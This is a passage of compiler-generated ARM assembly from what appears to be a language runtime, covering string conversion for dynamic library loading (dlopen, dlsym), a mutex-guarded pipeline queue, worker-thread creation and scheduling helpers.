ldr r2, [fp, #-68] ldr r1, [fp, #-96] add r2, r1, r2 mvn r3, r3, lsl #26 mvn r3, r3, lsr #26 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-110] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-68] add r3, r3, #1 ldr r1, [fp, #-96] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] b .L570 .L569: ldrh r3, [fp, #-110] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-68] ldr r1, [fp, #-96] add r2, r1, r2 mvn r3, r3, lsl #27 mvn r3, r3, lsr #27 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-110] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-68] add r3, r3, #1 ldr r1, [fp, #-96] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] ldrh r3, [fp, #-110] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-68] add r3, r3, #2 ldr r1, [fp, #-96] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] nop .L570: ldrb r2, [fp, #-111] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #68 ldmia r1, {r0-r1} adds r8, r0, r2 adc r9, r1, r3 str r8, [fp, #-68] str r9, [fp, #-64] b .L563 .L578: nop .L563: sub r3, fp, #52 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-140] adc r3, r3, #0 str r3, [fp, #-136] sub r3, fp, #140 ldmia r3, {r2-r3} str r2, [fp, #-52] str r3, [fp, #-48] .L561: sub r1, fp, #76 ldmia r1, {r0-r1} sub r3, fp, #52 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L573 sub r3, fp, #60 ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 ldr r3, [fp, #-96] str r3, [fp, #-84] str r4, [fp, #-36] str r5, [fp, #-32] ldr r3, [fp, #-36] mov r1, r3 ldr r0, [fp, #-84] bl realloc str r0, [fp, #-80] ldr r3, [fp, #-80] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L574 ldr r3, .L579 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L579+4 bl fwrite mov r0, #1 bl exit .L574: ldr r3, [fp, #-80] str r3, [fp, #-96] ldr r3, [fp, #-68] ldr r2, [fp, #-96] add r3, r2, r3 mov r2, #0 strb r2, [r3] ldr r3, [fp, #-96] str r3, [fp, #-108] ldr r1, .L579+8 ldr r0, [fp, #-108] bl dlopen str r0, [fp, #-104] ldr r0, [fp, #-108] bl free ldr r3, [fp, #-132] ldr r2, [fp, #-104] str r2, [r3] ldr r3, [fp, #-104] cmp r3, #0 movne r3, #1 moveq r3, #0 and r3, r3, #255 mov r0, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L580: .align 2 .L579: .word stderr .word .LC0 .word 257 .size shar__load__lib, .-shar__load__lib .align 2 .global shar__get__from__lib .syntax unified .arm .fpu softvfp .type shar__get__from__lib, %function shar__get__from__lib: @ args = 4, pretend = 0, frame = 112 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #112 str r0, [fp, #-124] str r1, [fp, #-120] str r2, [fp, #-128] str r3, [fp, #-132] sub r3, fp, #124 ldmia r3, {r2-r3} str r2, [fp, #-76] str r3, [fp, #-72] ldr r3, [fp, #-128] str r3, [fp, #-100] mov r3, #0 str r3, [fp, #-96] mov r2, #0 mov r3, #0 str r2, [fp, #-68] str r3, [fp, #-64] mov r2, #0 mov r3, #0 str r2, [fp, #-60] str r3, [fp, #-56] mov r2, #0 mov r3, #0 str r2, [fp, #-52] str r3, [fp, #-48] b .L582 .L594: ldr r3, [fp, #-52] lsl r3, r3, #1 ldr r2, [fp, #-100] add r3, r2, r3 ldrh r3, [r3] @ movhi strh r3, [fp, #-110] @ movhi mov r3, #0 strb r3, [fp, #-111] ldrh r3, [fp, #-110] cmp r3, #0 beq .L599 ldrh r3, [fp, #-110] cmp r3, #127 bhi .L585 mov r3, #1 strb r3, [fp, #-111] b .L586 .L585: ldrh r3, [fp, #-110] cmp r3, #2048 bcs .L587 mov r3, #2 strb r3, [fp, #-111] b .L586 .L587: mov r3, #3 strb r3, [fp, #-111] .L586: ldrb r2, [fp, #-111] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #60 ldmia r1, {r0-r1} adds r6, r0, r2 adc r7, r1, r3 str r6, [fp, #-60] str r7, [fp, #-56] ldr r3, [fp, #-96] str r3, [fp, #-92] sub r3, fp, #60 ldmia r3, {r2-r3} str r2, [fp, #-44] str r3, [fp, #-40] ldr r3, [fp, #-44] mov r1, r3 ldr r0, [fp, #-92] bl realloc str r0, [fp, #-88] ldr r3, [fp, #-88] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L588 ldr r3, .L600 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L600+4 bl fwrite mov r0, #1 bl exit .L588: ldr r3, [fp, #-88] str r3, [fp, #-96] ldrb r3, [fp, #-111] @ zero_extendqisi2 cmp r3, #3 beq .L590 cmp r3, #3 bgt .L591 cmp r3, #1 beq .L592 cmp r3, #2 beq .L593 b .L591 .L592: ldr r3, [fp, #-68] ldr r2, [fp, #-96] add r3, r2, r3 ldrh r2, [fp, #-110] @ movhi and r2, r2, #255 strb r2, [r3] b .L591 .L593: ldrh r3, [fp, #-110] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-68] ldr r1, [fp, #-96] add r2, r1, r2 mvn r3, r3, lsl #26 mvn r3, r3, lsr #26 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-110] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-68] add r3, r3, #1 ldr r1, [fp, #-96] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] b .L591 .L590: ldrh r3, [fp, #-110] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-68] ldr r1, [fp, #-96] add r2, r1, r2 mvn r3, r3, lsl #27 mvn r3, r3, lsr #27 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-110] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-68] add r3, r3, #1 ldr r1, [fp, #-96] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] ldrh r3, [fp, #-110] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-68] add r3, r3, #2 ldr r1, [fp, #-96] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] nop .L591: ldrb r2, [fp, #-111] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #68 ldmia r1, {r0-r1} adds r8, r0, r2 adc r9, r1, r3 str r8, [fp, #-68] str r9, [fp, #-64] b .L584 .L599: nop .L584: sub r3, fp, #52 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-140] adc r3, r3, #0 str r3, [fp, #-136] sub r3, fp, #140 ldmia r3, {r2-r3} str r2, [fp, #-52] str r3, [fp, #-48] .L582: sub r1, fp, #76 ldmia r1, {r0-r1} sub r3, fp, #52 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L594 sub r3, fp, #60 ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 ldr r3, [fp, #-96] str r3, [fp, #-84] str r4, [fp, #-36] str r5, [fp, #-32] ldr r3, [fp, #-36] mov r1, r3 ldr r0, [fp, #-84] bl realloc str r0, [fp, #-80] ldr r3, [fp, #-80] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L595 ldr r3, .L600 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L600+4 bl fwrite mov r0, #1 bl exit .L595: ldr r3, [fp, #-80] str r3, [fp, #-96] ldr r3, [fp, #-68] ldr r2, [fp, #-96] add r3, r2, r3 mov r2, #0 strb r2, [r3] ldr r3, [fp, #-96] str r3, [fp, #-108] ldr r1, [fp, #-108] ldr r0, [fp, #-132] bl dlsym str r0, [fp, #-104] ldr r0, [fp, #-108] bl free ldr r3, [fp, #4] ldr r2, [fp, #-104] str r2, [r3] ldr r3, [fp, #-104] cmp r3, #0 movne r3, #1 moveq r3, #0 and r3, r3, #255 mov r0, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L601: .align 2 .L600: .word stderr .word .LC0 .size shar__get__from__lib, .-shar__get__from__lib .align 2 .global shar__unload__lib .syntax unified .arm .fpu softvfp .type shar__unload__lib, %function shar__unload__lib: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] ldr r0, [fp, #-8] bl dlclose mov r3, r0 cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size shar__unload__lib, .-shar__unload__lib .local allowThreads .comm allowThreads,1,1 .data .align 3 .type numberOfActiveThreads, %object .size numberOfActiveThreads, 8 numberOfActiveThreads: .word 1 .word 0 .text .align 2 .global shar__pipeline__use__counter__inc .syntax unified .arm .fpu softvfp .type shar__pipeline__use__counter__inc, %function shar__pipeline__use__counter__inc: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, fp, lr} add fp, sp, #12 sub sp, sp, #16 str r0, [fp, #-28] str r1, [fp, #-24] ldr r3, [fp, #-28] str r3, [fp, #-16] ldr r3, [fp, #-16] add r3, r3, #32 mov r0, r3 bl pthread_mutex_lock ldr r3, [fp, #-16] ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 ldr r3, [fp, #-16] stm r3, {r4-r5} ldr r3, [fp, #-16] add r3, r3, #32 mov r0, r3 bl pthread_mutex_unlock nop sub sp, fp, #12 @ sp needed pop {r4, r5, fp, pc} .size shar__pipeline__use__counter__inc, .-shar__pipeline__use__counter__inc .align 2 .global shar__pipeline__use__counter__dec .syntax unified .arm .fpu softvfp .type shar__pipeline__use__counter__dec, %function shar__pipeline__use__counter__dec: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, fp, lr} add fp, sp, #12 sub sp, sp, #16 str r0, [fp, #-28] str r1, [fp, #-24] ldr r3, [fp, #-28] str r3, [fp, #-16] ldr r3, [fp, #-16] add r3, r3, #32 mov r0, r3 bl pthread_mutex_lock ldr r3, [fp, #-16] ldmia r3, {r2-r3} subs r4, r2, #1 sbc r5, r3, #0 ldr r3, [fp, #-16] stm r3, {r4-r5} ldr r3, [fp, #-16] ldmia r3, {r2-r3} orr r3, r2, r3 cmp r3, #0 moveq r3, #1 movne r3, #0 strb r3, [fp, #-17] ldr r3, [fp, #-16] add r3, r3, #32 mov r0, r3 bl pthread_mutex_unlock ldrb r3, [fp, #-17] @ zero_extendqisi2 mov r0, r3 sub sp, fp, #12 @ sp needed pop {r4, r5, fp, pc} .size shar__pipeline__use__counter__dec, .-shar__pipeline__use__counter__dec .align 2 .global shar__pipeline__is__use .syntax unified .arm .fpu softvfp .type shar__pipeline__is__use, %function shar__pipeline__is__use: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-20] str r1, [fp, #-16] ldr r3, [fp, #-20] str r3, [fp, #-8] ldr r3, [fp, #-8] add r3, r3, #32 mov r0, r3 bl pthread_mutex_lock ldr r3, [fp, #-8] ldmia r3, {r2-r3} cmp r3, #0 cmpeq r2, #1 movne r3, #1 moveq r3, #0 strb r3, [fp, #-9] ldr r3, [fp, #-8] add r3, r3, #32 mov r0, r3 bl pthread_mutex_unlock ldrb r3, [fp, #-9] @ zero_extendqisi2 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size shar__pipeline__is__use, .-shar__pipeline__is__use .align 2 .global shar__pipeline__get__data__for__free .syntax unified .arm .fpu softvfp .type shar__pipeline__get__data__for__free, %function shar__pipeline__get__data__for__free: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #20 str r0, [fp, #-20] str r1, [fp, #-16] ldr r3, [fp, #-20] str r3, [fp, #-8] ldr r3, [fp, #-8] ldr r1, [r3, #56] ldr r3, [fp, #-8] add r3, r3, #16 ldmia r3, {r2-r3} mov r3, r2 lsl r3, r3, #4 add r3, r1, r3 mov r2, r3 asr r3, r2, #31 mov r0, r2 mov r1, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size shar__pipeline__get__data__for__free, .-shar__pipeline__get__data__for__free .align 2 .global shar__pipeline__get__count__for__free .syntax unified .arm .fpu softvfp .type shar__pipeline__get__count__for__free, %function shar__pipeline__get__count__for__free: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #20 str r0, [fp, #-20] str r1, [fp, #-16] ldr r3, [fp, #-20] str r3, [fp, #-8] ldr r3, [fp, #-8] add r3, r3, #24 ldmia r3, {r2-r3} mov r0, r2 mov r1, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size shar__pipeline__get__count__for__free, .-shar__pipeline__get__count__for__free .section .rodata .align 2 .LC22: .ascii "Unable to create mutex.\012\000" .align 2 .LC23: .word __stack_chk_guard .text .align 2 .global shar__create__pipeline .syntax unified .arm .fpu softvfp .type shar__create__pipeline, %function shar__create__pipeline: @ args = 0, pretend = 0, frame = 104 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #108 ldr r3, .L621 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 mov r2, #64 mov r3, #0 str r2, [fp, #-92] str r3, [fp, #-88] ldr r3, [fp, #-92] mov r0, r3 bl malloc mov r3, r0 str r3, [fp, #-104] ldr r3, [fp, #-104] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L614 ldr r3, .L621+4 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L621+8 bl fwrite mov r0, #1 bl exit .L614: ldr r3, [fp, #-104] str r3, [fp, #-112] mov r2, #512 mov r3, #0 str r2, [fp, #-100] str r3, [fp, #-96] ldr r3, [fp, #-100] mov r0, r3 bl malloc mov r3, r0 str r3, [fp, #-108] ldr r3, [fp, #-108] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L616 ldr r3, .L621+4 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L621+8 bl fwrite mov r0, #1 bl exit .L616: ldr r4, [fp, #-108] ldr r3, [fp, #-112] mov r0, r3 mov r3, #64 mov r2, r3 mov r1, #0 bl memset ldr r1, [fp, #-112] mov r2, #1 mov r3, #0 stm r1, {r2-r3} ldr r1, [fp, #-112] mov r2, #32 mov r3, #0 str r2, [r1, #8] str r3, [r1, #12] ldr r3, [fp, #-112] str r4, [r3, #56] ldr r3, [fp, #-112] add r3, r3, #32 mov r1, #0 mov r0, r3 bl pthread_mutex_init mov r3, r0 cmp r3, #0 movne r3, #1 moveq r3, #0 and r3, r3, #255 cmp r3, #0 beq .L618 ldr r3, .L621+4 ldr r3, [r3] mov r2, #24 mov r1, #1 ldr r0, .L621+12 bl fwrite mov r0, #1 bl exit .L618: ldr r3, [fp, #-112] mov r2, r3 asr r3, r2, #31 ldr r1, .L621 ldr r0, [r1] ldr r1, [fp, #-16] eors r0, r1, r0 mov r1, #0 beq .L620 bl __stack_chk_fail .L620: mov r0, r2 mov r1, r3 sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .L622: .align 2 .L621: .word .LC23 .word stderr .word .LC0 .word .LC22 .size shar__create__pipeline, .-shar__create__pipeline .align 2 .global shar__pipeline__push .syntax unified .arm .fpu softvfp .type shar__pipeline__push, %function shar__pipeline__push: @ args = 16, pretend = 8, frame = 40 @ frame_needed = 1, uses_anonymous_args = 0 sub sp, sp, #8 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #40 str r0, [fp, #-60] str r1, [fp, #-56] add r1, fp, #4 stm r1, {r2, r3} ldr r3, [fp, #-60] str r3, [fp, #-48] ldr r3, [fp, #-48] add r3, r3, #32 mov r0, r3 bl pthread_mutex_lock ldr r3, [fp, #-48] add r3, r3, #8 ldmia r3, {r2-r3} str r2, [fp, #-68] str r3, [fp, #-64] ldr r3, [fp, #-48] add r1, r3, #16 ldmia r1, {r0-r1} ldr r3, [fp, #-48] add r3, r3, #24 ldmia r3, {r2-r3} adds r6, r0, r2 adc r7, r1, r3 sub r3, fp, #68 ldmia r3, {r2-r3} cmp r3, r7 cmpeq r2, r6 bne .L624 ldr r3, [fp, #-48] add r3, r3, #16 ldmia r3, {r2-r3} orrs r3, r2, r3 bne .L625 ldr r3, [fp, #-48] add r3, r3, #8 ldmia r3, {r2-r3} adds r8, r2, r2 adc r9, r3, r3 mov r2, r8 mov r3, r9 ldr r1, [fp, #-48] str r2, [r1, #8] str r3, [r1, #12] ldr r3, [fp, #-48] ldr ip, [r3, #56] ldr r3, [fp, #-48] add r1, r3, #8 ldmia r1, {r0-r1} mov r2, #0 mov r3, #0 lsl r3, r1, #4 orr r3, r3, r0, lsr #28 lsl r2, r0, #4 str ip, [fp, #-44] str r2, [fp, #-36] str r3, [fp, #-32] ldr r3, [fp, #-36] mov r1, r3 ldr r0, [fp, #-44] bl realloc str r0, [fp, #-40] ldr r3, [fp, #-40] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L626 ldr r3, .L628 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L628+4 bl fwrite mov r0, #1 bl exit .L626: ldr r2, [fp, #-40] ldr r3, [fp, #-48] str r2, [r3, #56] b .L624 .L625: ldr r3, [fp, #-48] ldr r0, [r3, #56] ldr r3, [fp, #-48] ldr r1, [r3, #56] ldr r3, [fp, #-48] add r3, r3, #16 ldmia r3, {r2-r3} mov r3, r2 lsl r3, r3, #4 add r1, r1, r3 ldr r3, [fp, #-48] add r3, r3, #24 ldmia r3, {r2-r3} mov r3, r2 lsl r3, r3, #4 mov r2, r3 bl memmove ldr r1, [fp, #-48] mov r2, #0 mov r3, #0 str r2, [r1, #16] str r3, [r1, #20] .L624: ldr r3, [fp, #-48] ldr r1, [r3, #56] ldr r3, [fp, #-48] add r3, r3, #16 ldmia r3, {r2-r3} mov r0, r2 ldr r3, [fp, #-48] add r3, r3, #24 ldmia r3, {r2-r3} mov r3, r2 add r3, r0, r3 lsl r3, r3, #4 add r3, r1, r3 mov ip, r3 add r3, fp, #4 ldm r3, {r0, r1, r2, r3} stm ip, {r0, r1, r2, r3} ldr r3, [fp, #-48] add r3, r3, #24 ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 ldr r3, [fp, #-48] str r4, [r3, #24] str r5, [r3, #28] ldr r3, [fp, #-48] add r3, r3, #32 mov r0, r3 bl pthread_mutex_unlock nop sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, lr} add sp, sp, #8 bx lr .L629: .align 2 .L628: .word stderr .word .LC0 .size shar__pipeline__push, .-shar__pipeline__push .align 2 .global shar__pipeline__pop .syntax unified .arm .fpu softvfp .type shar__pipeline__pop, %function shar__pipeline__pop: @ args = 0, pretend = 0, frame = 40 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, fp, lr} add fp, sp, #20 sub sp, sp, #40 str r0, [fp, #-48] str r2, [fp, #-60] str r3, [fp, #-56] ldr r3, [fp, #-60] str r3, [fp, #-40] ldr r3, [fp, #-40] add r3, r3, #32 mov r0, r3 bl pthread_mutex_lock ldr r3, [fp, #-40] add r3, r3, #24 ldmia r3, {r2-r3} orrs r3, r2, r3 bne .L631 mov r2, #0 mov r3, #0 str r2, [fp, #-36] str r3, [fp, #-32] mov r3, #0 str r3, [fp, #-28] b .L632 .L631: ldr r3, [fp, #-40] ldr r1, [r3, #56] ldr r3, [fp, #-40] add r3, r3, #16 ldmia r3, {r2-r3} mov r3, r2 lsl r3, r3, #4 add r3, r1, r3 sub ip, fp, #36 ldm r3, {r0, r1, r2, r3} stm ip, {r0, r1, r2, r3} ldr r3, [fp, #-40] add r3, r3, #16 ldmia r3, {r2-r3} adds r6, r2, #1 adc r7, r3, #0 ldr r3, [fp, #-40] str r6, [r3, #16] str r7, [r3, #20] ldr r3, [fp, #-40] add r3, r3, #24 ldmia r3, {r2-r3} subs r4, r2, #1 sbc r5, r3, #0 ldr r3, [fp, #-40] str r4, [r3, #24] str r5, [r3, #28] .L632: ldr r3, [fp, #-40] add r3, r3, #32 mov r0, r3 bl pthread_mutex_unlock ldr r3, [fp, #-48] mov ip, r3 sub r3, fp, #36 ldm r3, {r0, r1, r2, r3} stm ip, {r0, r1, r2, r3} ldr r0, [fp, #-48] sub sp, fp, #20 @ sp needed pop {r4, r5, r6, r7, fp, pc} .size shar__pipeline__pop, .-shar__pipeline__pop .align 2 .global shar__destroy__pipeline .syntax unified .arm .fpu softvfp .type shar__destroy__pipeline, %function shar__destroy__pipeline: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-20] str r1, [fp, #-16] ldr r3, [fp, #-20] str r3, [fp, #-8] ldr r3, [fp, #-8] add r3, r3, #32 mov r0, r3 bl pthread_mutex_destroy ldr r3, [fp, #-8] ldr r3, [r3, #56] mov r0, r3 bl free ldr r0, [fp, #-8] bl free nop sub sp, fp, #4 @ sp needed pop {fp, pc} .size shar__destroy__pipeline, .-shar__destroy__pipeline .section .rodata .align 2 .LC24: .word __stack_chk_guard .text .align 2 .syntax unified .arm .fpu softvfp .type run_worker, %function run_worker: @ args = 0, pretend = 0, frame = 152 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, fp, lr} add fp, sp, #12 sub sp, sp, #176 str r0, [fp, #-144] ldr r3, .L638 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 mov r3, #1 str r3, [fp, #-140] ldr r3, [fp, #-140] mov r2, r3 asr r3, r2, #31 mov r1, #5 str r1, [sp] ldr r0, .L638+4 bl __atomic_fetch_add_8 mov r2, r0 mov r3, r1 str r2, [fp, #-124] str r3, [fp, #-120] ldr r3, [fp, #-144] sub ip, fp, #60 mov lr, r3 ldmia lr!, {r0, r1, r2, r3} stmia ip!, {r0, r1, r2, r3} ldmia lr!, {r0, r1, r2, r3} stmia ip!, {r0, r1, r2, r3} ldm lr, {r0, r1} stm ip, {r0, r1} ldr r3, [fp, #-60] str r3, [fp, #-132] ldr r3, [fp, #-56] str r3, [fp, #-128] sub ip, fp, #108 sub r3, fp, #52 ldm r3, {r0, r1, r2, r3} stm ip, {r0, r1, r2, r3} sub ip, fp, #92 sub r3, fp, #36 ldm r3, {r0, r1, r2, r3} stm ip, {r0, r1, r2, r3} sub r3, fp, #108 ldmia r3, {r2-r3} mov r0, r2 mov r1, r3 bl shar__pipeline__use__counter__inc sub r3, fp, #92 ldmia r3, {r2-r3} mov r0, r2 mov r1, r3 bl shar__pipeline__use__counter__inc sub lr, fp, #76 add ip, sp, #8 sub r3, fp, #92 ldm r3, {r0, r1, r2, r3} stm ip, {r0, r1, r2, r3} mov r2, sp sub r3, fp, #100 ldm r3, {r0, r1} stm r2, {r0, r1} sub r3, fp, #108 ldm r3, {r2, r3} ldr r1, [fp, #-132] mov r0, lr blx r1 sub r5, fp, #92 ldmia r5, {r4-r5} mov r2, sp sub r3, fp, #68 ldm r3, {r0, r1} stm r2, {r0, r1} sub r3, fp, #76 ldm r3, {r2, r3} mov r0, r4 mov r1, r5 bl shar__pipeline__push sub ip, fp, #164 mov r2, sp sub r3, fp, #100 ldm r3, {r0, r1} stm r2, {r0, r1} sub r3, fp, #108 ldm r3, {r2, r3} ldr r1, [fp, #-128] mov r0, ip blx r1 sub ip, fp, #164 mov r2, sp sub r3, fp, #84 ldm r3, {r0, r1} stm r2, {r0, r1} sub r3, fp, #92 ldm r3, {r2, r3} ldr r1, [fp, #-128] mov r0, ip blx r1 mov r3, #1 str r3, [fp, #-136] ldr r3, [fp, #-136] mov r2, r3 asr r3, r2, #31 mov r1, #5 str r1, [sp] ldr r0, .L638+4 bl __atomic_fetch_sub_8 mov r2, r0 mov r3, r1 str r2, [fp, #-116] str r3, [fp, #-112] ldr r0, [fp, #-144] bl free mov r3, #0 ldr r2, .L638 ldr r1, [r2] ldr r2, [fp, #-16] eors r1, r2, r1 mov r2, #0 beq .L637 bl __stack_chk_fail .L637: mov r0, r3 sub sp, fp, #12 @ sp needed pop {r4, r5, fp, pc} .L639: .align 2 .L638: .word .LC24 .word numberOfActiveThreads .size run_worker, .-run_worker .section .rodata .align 2 .LC25: .ascii "At the stage of calculating constants, it is forbid" .ascii "den to use threads.\012\000" .align 2 .LC26: .ascii "Failed to start new thread.\012\000" .align 2 .LC27: .word __stack_chk_guard .text .align 2 .global shar__create__worker .syntax unified .arm .fpu softvfp .type shar__create__worker, %function shar__create__worker: @ args = 36, pretend = 8, frame = 72 @ frame_needed = 1, uses_anonymous_args = 0 sub sp, sp, #8 push {fp, lr} add fp, sp, #4 sub sp, sp, #72 str r0, [fp, #-72] add r1, fp, #4 stm r1, {r2, r3} ldr r3, [fp, #36] str r3, [fp, #-76] ldr r3, .L647 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 ldr r3, .L647+4 ldrb r3, [r3] @ zero_extendqisi2 eor r3, r3, #1 and r3, r3, #255 cmp r3, #0 beq .L641 ldr r3, .L647+8 ldr r3, [r3] mov r2, #71 mov r1, #1 ldr r0, .L647+12 bl fwrite mov r0, #1 bl exit .L641: mov r2, #40 mov r3, #0 str r2, [fp, #-60] str r3, [fp, #-56] ldr r3, [fp, #-60] mov r0, r3 bl malloc mov r3, r0 str r3, [fp, #-64] ldr r3, [fp, #-64] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L642 ldr r3, .L647+8 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L647+16 bl fwrite mov r0, #1 bl exit .L642: ldr r3, [fp, #-64] str r3, [fp, #-68] ldr r3, [fp, #-68] ldr r2, [fp, #-72] str r2, [r3] ldr r3, [fp, #-68] ldr r2, [fp, #-76] str r2, [r3, #4] ldr r3, [fp, #-68] add ip, r3, #8 add r3, fp, #4 ldm r3, {r0, r1, r2, r3} stm ip, {r0, r1, r2, r3} ldr r3, [fp, #-68] add ip, r3, #24 add r3, fp, #20 ldm r3, {r0, r1, r2, r3} stm ip, {r0, r1, r2, r3} sub r0, fp, #52 ldr r3, [fp, #-68] ldr r2, .L647+20 mov r1, #0 bl pthread_create mov r3, r0 cmp r3, #0 movne r3, #1 moveq r3, #0 and r3, r3, #255 cmp r3, #0 beq .L646 ldr r3, .L647+8 ldr r3, [r3] mov r2, #28 mov r1, #1 ldr r0, .L647+24 bl fwrite mov r0, #1 bl exit .L646: nop ldr r3, .L647 ldr r2, [r3] ldr r3, [fp, #-8] eors r2, r3, r2 mov r3, #0 beq .L645 bl __stack_chk_fail .L645: sub sp, fp, #4 @ sp needed pop {fp, lr} add sp, sp, #8 bx lr .L648: .align 2 .L647: .word .LC27 .word allowThreads .word stderr .word .LC25 .word .LC0 .word run_worker .word .LC26 .size shar__create__worker, .-shar__create__worker .align 2 .global shar__yield .syntax unified .arm .fpu softvfp .type shar__yield, %function shar__yield: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 bl sched_yield nop pop {fp, pc} .size shar__yield, .-shar__yield .global __aeabi_ldivmod .section .rodata .align 2 .LC28: .word __stack_chk_guard .text .align 2 .global shar__sleep .syntax unified .arm .fpu softvfp .type shar__sleep, %function shar__sleep: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, 